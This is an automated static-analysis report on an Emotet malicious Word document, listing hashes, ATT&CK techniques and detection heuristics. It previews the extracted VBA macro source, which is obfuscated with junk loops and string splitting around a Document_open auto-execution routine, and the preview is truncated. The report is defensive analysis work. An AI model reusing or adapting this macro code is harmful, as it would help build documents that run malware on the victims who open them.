Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 99e567b65413467c…

MALICIOUS

Office (OLE)

Size: 182.5 KB
Created: 2019-12-20 17:07:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: e5fbb4bfb9babd60fb9c082fb69c1afc
SHA-1: a2c281cdf0000e673d9fdb3801d24e4e55e4681e
SHA-256: 99e567b65413467cd68e866366bcd22e1245a74078213fb4a5b21e4b1dbaffde
Risk Score: 202

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for Emotet. The macro's structure suggests it is designed to execute code upon opening the document. ClamAV detection also explicitly identifies it as an Emotet downloader. No specific URLs or executable payloads were directly extracted, but the presence of the macro and its execution trigger are strong indicators of malicious intent.

Heuristics (6)

  • ClamAV: Doc.Downloader.Emotet-7473497-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7473497-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Document_Open macro [high] (OLE_VBA_DOCOPEN)
    Document_Open macro
  • GetObject call [high] (OLE_VBA_GETOBJ)
    GetObject call
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  7618 bytes
SHA-256: 4eb0a6204ead2a81b7a349e14398ad82fab5fd22cadc6ae7c7620b352b43e3e0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Aojplemq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Gzuokbkyuug, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Ltyncvvwo = 234 + 423
   Do While Cikubwvivihv = 1
      Hcmhzkjwdl = 3 * Fqdsyasenoww
      Fnxyeyndusjo = ("Repellendus est quia culpa omnis totam provident quibusdam aut dolorum.")
      For Jffyugqfec = Cgwsgpnie To Fhbicvkijmfvh
         Bnbajuowvggcm = ("Rerum ad nihil vel.")
         Gingzqsy = 223
      Next
      Uuavxkoiio = Elfrlfbvs
Loop
Ewxdqdei
   Ewdbqeofwfve = 234 + 423
   Do While Ucwjhgwmvyh = 1
      Rdkgxjky = 3 * Hscfaewhrzd
      Ynesxsaetxd = ("Qui facilis cumque porro nam sunt eum sed in dolor.")
      For Lzxvhrtl = Favhzrpsxom To Trngalouzizs
         Wrljfjwzrb = ("Velit saepe.")
         Ndffipzh = 223
      Next
      Ulszawfr = Chtalegcvuz
Loop
End Sub

Attribute VB_Name = "Jeuwzqvsdrcqz"
Attribute VB_Base = "0{37180A27-35CF-4DD5-8ADF-8363A452C7B0}{65924915-F776-442B-B179-A71421B8A689}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Rgzhzedt"
Function Ypzdgmswtvdol()
   Ecpsjpwmt = 234 + 423
   Do While Iflpcowzdtqob = 1
      Qlrgusoolmu = 3 * Evuphzdzzkfb
      Mnnnndwy = ("Et.")
      For Nqguqadhjbui = Gckorame To Bbxyhbyfjab
         Jiygysjieomg = ("Enim ut vel.")
         Hhkijhrspcfz = 223
      Next
      Oyzzpjbf = Nlzgxmlswiqx
Loop
Ccahqiqatqpii = Aojplemq.Gzuokbkyuug
   Xoxcfslhh = 234 + 423
   Do While Pkocrnurft = 1
      Kkoupcjxomswo = 3 * Llcoewtryqjb
      Bqljpnrrywfxb = ("Autem.")
      For Sroysigd = Cqtqegapan To Nyfcungih
         Ofyvdbnvnganx = ("Ipsa minima aut odit laborum architecto.")
         Upfiaghl = 223
      Next
      Tqotxwchqfk = Xomriamlhe
Loop
Iyufykfdyvmgd = Ccahqiqatqpii + Jeuwzqvsdrcqz.Gshrkbqz + Jeuwzqvsdrcqz.Zomuekcd + Jeuwzqvsdrcqz.Jrgysmbu
   Zcyuqbzhudyk = 234 + 423
   Do While Wvxzhtphlfoe = 1
      Ibunrqdbman = 3 * Aoxboyme
      Vjpfsrtgmsmz = ("In tempora dolor aut amet.")
      For Kskovjxldp = Ndafwiujyeck To Sublrbvoqv
         Jeukgzrzeqfgv = ("Ut facilis sint consequatur et et voluptas.")
         Jkgqadlqc = 223
      Next
      Xmwymfrzzqoo = Skfbpvqn
Loop
Ztivzgiogphbr = Iyufykfdyvmgd + Jeuwzqvsdrcqz.Yiaxbzchth + Jeuwzqvsdrcqz.Xgxatuyc.Tag
   Lhsyghafslbi = 234 + 423
   Do While Letzvixom = 1
      Xdgyuyaelpj = 3 * Hgrkaaarl
      Gdjeewwuxkid = ("Ea et.")
      For Xmadmqbyo = Rnomuxlsorr To Aosoiuycxcdnz
         Uphpromjiicnw = ("Magnam.")
         Pgxecxxnq = 223
      Next
      Ntkkyuimxzkb = Ofkffhbrs
Loop
Ypzdgmswtvdol = Mqqyhrxynq + Ztivzgiogphbr + Mqqyhrxynq
   Yyqtlblmjar = 234 + 423
   Do While Usazcqclwva = 1
      Bvovtqeuu = 3 * Dwiiuaeoe
      Iihvwfbbcqq = ("Quaerat id voluptates quis est.")
      For Pyngajvzaswfh = Wqlyskngoyty To Prmpitwmynup
         Plpplkfme = ("Dicta.")
         Pcryihkdhla = 223
      Next
      Zavjsxectfr = Enincmvatq
Loop
End Function
Function Ewxdqdei()
   Hhahpldlmgytv = 234 + 423
   Do While Bdbvsqpntmg = 1
      Cpsroosgidlmw = 3 * Nxrrvfnk
      Iisthuiee = ("Larry")
      For Ogehjisaqjwkm = Vpltofzmgfamb To Hrygzqmk
         Ujcwmygukzttl = ("Ronnie")
         Puyciwrsobfm = 223
      Next
      Gifyxuvw = Gurqiiogepkv
Loop
iwiwiiwiwjjsj = "__&888*&^bBGks^@"
   Dxztlkebm = 234 + 423
   Do While Ngqkvsvdtavag = 1
      Mvopoxnzbmda = 3 * Vpwvlvkkk
      Xiaghwsmsyin = ("Sint hic officiis vel.")
      For Bagoxrskw = Yfumibldur To Ttpkosinbao
         Evmtdnmdvjry = ("Et.")
         Wwjcpnmnvh = 223
      Next
      Rojjyrkr = Zjqecjxky
Loop
Uqdvmpngkfcs = Split("__&888*&^bBGks^@wi__&888*&^bBGks^@nmg__&888*&^b" + "BGks^@mts__&888*&^b
... (truncated)